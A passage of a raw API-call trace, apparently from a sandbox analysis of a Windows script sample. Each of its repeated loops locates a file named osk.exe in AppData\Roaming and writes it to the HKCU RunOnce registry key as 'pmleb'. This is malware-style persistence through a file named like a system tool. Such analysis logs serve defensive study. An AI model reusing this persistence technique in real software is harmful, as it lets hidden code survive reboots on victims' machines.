[3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.172] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.172] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.172] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0082.172] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.172] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x64 [0082.172] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.173] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0082.173] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.173] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.173] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.173] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.173] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.173] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.173] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.174] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.174] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.174] RegCloseKey (hKey=0x280) returned 0x0 [0082.174] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.174] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.174] SetTimer (hWnd=0x20280, nIDEvent=0x20df, uElapse=0xa, lpTimerFunc=0x0) returned 0x20df [0082.174] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.186] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.186] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.187] KillTimer (hWnd=0x20280, uIDEvent=0x20df) returned 1 [0082.187] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.187] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.187] IUnknown:Release (This=0x787518) returned 0x1 [0082.187] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.187] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.187] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.187] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.187] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.187] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.188] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.188] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.188] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.188] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0082.188] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.188] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x65 [0082.188] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.189] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0082.189] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.189] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.189] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.189] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.189] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.189] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.189] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.189] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.190] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.190] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.190] RegCloseKey (hKey=0x280) returned 0x0 [0082.190] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.190] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.190] SetTimer (hWnd=0x20280, nIDEvent=0x20e0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e0 [0082.190] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.202] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.202] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.202] KillTimer (hWnd=0x20280, uIDEvent=0x20e0) returned 1 [0082.202] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.202] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.203] IUnknown:Release (This=0x787518) returned 0x1 [0082.203] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.203] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.203] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.203] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.203] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0082.203] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.203] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x66 [0082.204] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.204] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0082.204] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.205] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.205] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.205] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.205] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.205] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.205] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.205] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.205] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.206] RegCloseKey (hKey=0x280) returned 0x0 [0082.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.206] SetTimer (hWnd=0x20280, nIDEvent=0x20e1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e1 [0082.206] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.217] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.217] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.218] KillTimer (hWnd=0x20280, uIDEvent=0x20e1) returned 1 [0082.218] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.218] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.218] IUnknown:Release (This=0x787518) returned 0x1 [0082.218] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.218] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.218] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.219] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 